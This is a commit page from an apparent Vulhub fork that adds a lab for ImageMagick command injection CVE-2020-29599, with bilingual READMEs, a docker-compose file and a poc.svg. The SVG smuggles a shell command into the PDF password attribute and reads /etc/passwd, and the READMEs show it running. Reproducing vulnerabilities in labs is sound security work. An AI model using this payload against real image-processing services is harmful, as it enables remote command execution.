aaronxu/vulhub
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

first commit
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Details
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Details
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Details
Vulhub Docker Image CI / images-test (push) Has been cancelled
Details

Browse Source
This commit is contained in:
Aaron
2025-09-06 16:08:15 +08:00
commit 63285f61aa
2624 changed files with 88491 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

BIN
imagemagick/CVE-2020-29599/1.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 31 KiB

38
imagemagick/CVE-2020-29599/README.md Normal file
View File

@@ -0,0 +1,38 @@
# ImageMagick Shell Injection via PDF Password (CVE-2020-29599)
[中文版本(Chinese version)](README.zh-cn.md)
ImageMagick is a free and open-source cross-platform software suite for displaying, creating, converting, modifying, and editing raster images.
References:
- https://insert-script.blogspot.com/2020/11/imagemagick-shell-injection-via-pdf.html
## Environment Setup and Exploit
Execute the following command to enter the Linux shell where Imagemagick 7.0.10-36 is installed:
```
docker compose run im bash
```
Enter the `/tmp` directory and convert the format of [poc.svg](poc.svg) to trigger the vulnerability:
```
root@f200ec9e1c1e:/# cd /tmp/
root@f200ec9e1c1e:/tmp# ls
poc.svg
root@f200ec9e1c1e:/tmp# identify poc.svg
poc.svg SVG 700x700 700x700+0+0 16-bit sRGB 398B 0.000u 0:00.003
root@f200ec9e1c1e:/tmp# convert poc.svg poc.png
sh: 1: : Permission denied
convert: MagickCore/image.c:1168: DestroyImage: Assertion `image != (Image *) NULL' failed.
Aborted
root@f200ec9e1c1e:/tmp# ls
0wned poc.svg
root@f200ec9e1c1e:/tmp#
```
The command `echo $(id)> ./0wned` has been executed successfully:
![](1.png)

36
imagemagick/CVE-2020-29599/README.zh-cn.md Normal file
View File

@@ -0,0 +1,36 @@
# Imagemagick PDF密码位置命令注入漏洞CVE-2020-29599
ImageMagick是一款使用量很广的图片处理程序很多厂商都调用了这个程序进行图片处理包括图片的伸缩、切割、水印、格式转换等等。研究者@insertScript 发现在Imagemagick 7.0.10-35到7.0.10-40、6.9.11-35 up到6.9.11-40处理PDF的过程中存在一处命令注入漏洞通过构造好的SVG格式图片文件即可在Imagemagick中注入任意命令。
参考链接:
- https://insert-script.blogspot.com/2020/11/imagemagick-shell-injection-via-pdf.html
## 漏洞环境与复现
直接执行如下命令进入安装了Imagemagick 7.0.10-36的Linux环境
```
docker compose run im bash
```
进入`/tmp`目录,对[poc.svg](poc.svg)进行格式转换,即可触发漏洞:
```
root@f200ec9e1c1e:/# cd /tmp/
root@f200ec9e1c1e:/tmp# ls
poc.svg
root@f200ec9e1c1e:/tmp# identify poc.svg
poc.svg SVG 700x700 700x700+0+0 16-bit sRGB 398B 0.000u 0:00.003
root@f200ec9e1c1e:/tmp# convert poc.svg poc.png
sh: 1: : Permission denied
convert: MagickCore/image.c:1168: DestroyImage: Assertion `image != (Image *) NULL' failed.
Aborted
root@f200ec9e1c1e:/tmp# ls
0wned poc.svg
root@f200ec9e1c1e:/tmp#
```
此时命令`echo $(id)> ./0wned`已执行成功:
![](1.png)

6
imagemagick/CVE-2020-29599/docker-compose.yml Normal file
View File

@@ -0,0 +1,6 @@
version: '2'
services:
im:
image: vulhub/imagemagick:7.0.10-36
volumes:
- ./poc.svg:/tmp/poc.svg

9
imagemagick/CVE-2020-29599/poc.svg Normal file
View File

@@ -0,0 +1,9 @@
<image authenticate='ff" `echo $(id)> ./0wned`;"'>
<read filename="pdf:/etc/passwd"/>
<get width="base-width" height="base-height" />
<resize geometry="400x400" />
<write filename="test.png" />
<svg width="700" height="700" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<image xlink:href="msl:poc.svg" height="100" width="100"/>
</svg>
</image>